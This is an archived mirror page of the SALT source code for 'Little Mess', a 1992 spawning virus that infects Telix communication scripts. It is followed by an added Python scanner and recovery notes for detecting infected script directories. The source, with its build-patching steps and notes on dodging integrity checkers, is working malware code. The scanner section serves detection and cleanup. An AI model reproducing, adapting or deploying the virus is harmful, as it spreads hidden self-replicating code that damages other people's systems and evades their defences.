💾 Archived View for spam.works › mirrors › textfiles › virus › ltlmess.slt captured on 2023-11-04 at 16:02:00.

-=-=-=-=-=-=-

// Little Mess spawning virus source (c) 92 Crom-Cruach/Trident
// Source in SALT
//
// The compiled script needs some little changes:
// *First, both 1234h's in the SLC must be replaced by (FileLen-011h)
// *the 1st 11h bytes of the script must be copied over the 'REPLACE ME!';
// *Both 1D 06 00's sequences MUST be replaced by 1D 02 00...

// This is of course only educational, and even if it wasn't, it still wouldn't
// spread due to the script exchange rate.
//
// Bad minds, however, might think it's fun having their local network-sysop
// screaming about his system being infected while all anti-viral/integrity
// programs miss it (or, him being dissed for saying he's got a
// script-virus)... Of course, those people are wrong and/or sick.

// Symptoms - 1 out of 8 times it displays a message for 1 sec after 
// script execution if all scripts infected.

// Greetz - NuKE / Phalcon/SKISM / YAM & All other practicing researchers...

// Technical info ---
//
// First, the uninfected file is renamed to *.SLX.
// Then, the SLC file is created and the copy of the header is written to it.
// After that, the whole virus is written as a string to the file (SALT-string
// identification code is 19h; offsets in SLC are calculated relative to the
// end of the header (= on +0Ch) - The 06 -> 02 patch changes the offset of the
// buffer to write from Title (+6) to [EndHeader+1] (+2)... The 1234-patch is
// needed to fill in the size of that string). After that, some random bytes
// are written to make the files less suspicious (the amount must be even; at
// least, CS (the TELIX script compiler) never creates files with odd lengths)
// I wanted to mark the SLX files as hidden; but in SALT you can only -read-
// the attribute of a file. Solution could be to write a little routine in ASM
// to a temporary file & to RUN that file; I decided not to, because the flash
// from the shell-to-dos is much more obvious than some 'SLX'-files.

// A system can be infected by starting this script from Telix. It will
// infect one script at a time.

int EndHeader = 0x123419;               // Needed for code-copy
str Title[40] = "[Little Mess (c) 92 Crom-Cruach/Trident]";
str Org_Ext[4] = ".SLX";

str Path[64],Trash[64];
str Buf[12] = "";                       // No script to start after 'mother'.
str Spawned_On[12];

// Header
str Header[17]="REPLACE ME!";           // must be replaced by header (debug)
int Handle;
main()
{
 Spawned_On = Buf;
 path = _script_dir;
 strcat(path,"*.SLC");                  // Search script (not 8 chars-FName!)
FNext:
 if (not FileFind(path,0,Buf))          // File found?
 { EndHeader=0; }                       // No more; mark 'all infected'
 else
 {
  path = "";                            // Prepare for find-next
  trash = _script_dir;
  strcat(trash,Buf);                    // Trash = path+filename+ext
  FNStrip(Trash,7,Buf);                 // Buf = filename only
  strcat(Buf,Org_Ext);                  // Give new extension
  if (frename(Trash,Buf) != 0) goto FNext;
                                        // File not renamed (already spawned)

  Handle = FOpen(Trash,"w");            // Make new file, same name
  If (Handle == 0)                      // Error opening; restore orig. fname
  {
    Path = _script_dir;
    strcat(path,Buf);                   // path = path+new_fname
    frename(Path,Trash);                // rename-back
    goto Quit_Infect;
  }
  FWrite(Header,17,Handle);             // Write header

  FWrite(Title,0x1234,Handle);       // Title REPLACED by (ofs EndH.+1)

  FWrite(Title,(CurTime()&254),Handle); // Make size random (must be even)
  FClose(Handle);
 }
Quit_Infect:
call(Spawned_On);                       // Start orig. script
if ((EndHeader==0) and                  // If all infected
 ((CurTime()&7)==7))                    // Show message 1 out of 8 times
  Status_Wind("Legalize Marijuana! - ??????",10);
}
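
The technical notes in the listing describe two artifacts a defender can look for in a Telix script directory: the original script renamed to NAME.SLX beside a newly created NAME.SLC, and the Title string carried inside the spawned file. The scanner below is an added example, not part of the original listing; it assumes the Title string survives compilation verbatim, and its function names and sample files are constructed for illustration.

```python
import os
import tempfile

# Title string from the source listing; assumed to survive compilation verbatim.
MARKER = b"[Little Mess (c) 92 Crom-Cruach/Trident]"

def scan_script_dir(script_dir):
    """Return sorted (stem, reason) findings for one Telix script directory."""
    by_stem = {}
    for entry in os.listdir(script_dir):
        stem, ext = os.path.splitext(entry)
        by_stem.setdefault(stem.upper(), {})[ext.upper()] = entry
    findings = []
    for stem, exts in sorted(by_stem.items()):
        if ".SLC" not in exts:
            continue
        # Spawning leaves the original renamed to NAME.SLX beside a new NAME.SLC.
        if ".SLX" in exts:
            findings.append((stem, "companion-slx"))
        with open(os.path.join(script_dir, exts[".SLC"]), "rb") as fh:
            if MARKER in fh.read():
                findings.append((stem, "title-marker"))
    return findings

def build_sample_dir():
    """Constructed sample: inert placeholder bytes, not real compiled scripts."""
    root = tempfile.mkdtemp(prefix="telix_scripts_")
    samples = {
        "LOGIN.SLC": b"\x00" * 32,                         # clean, no sibling
        "DIAL.SLX": b"\x00" * 32,                          # original moved aside
        "DIAL.SLC": b"\x00" * 17 + MARKER + b"\x00" * 6,   # stand-in for a spawned copy
        "HOST.SLX": b"\x00" * 32,                          # orphan .SLX, no .SLC
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for stem, reason in scan_script_dir(build_sample_dir()):
        print(f"{stem}: {reason}")
```

Per the listing's own description, the untouched original is the .SLX file, so a flagged pair is recovered by removing the spawned .SLC and renaming the .SLX back.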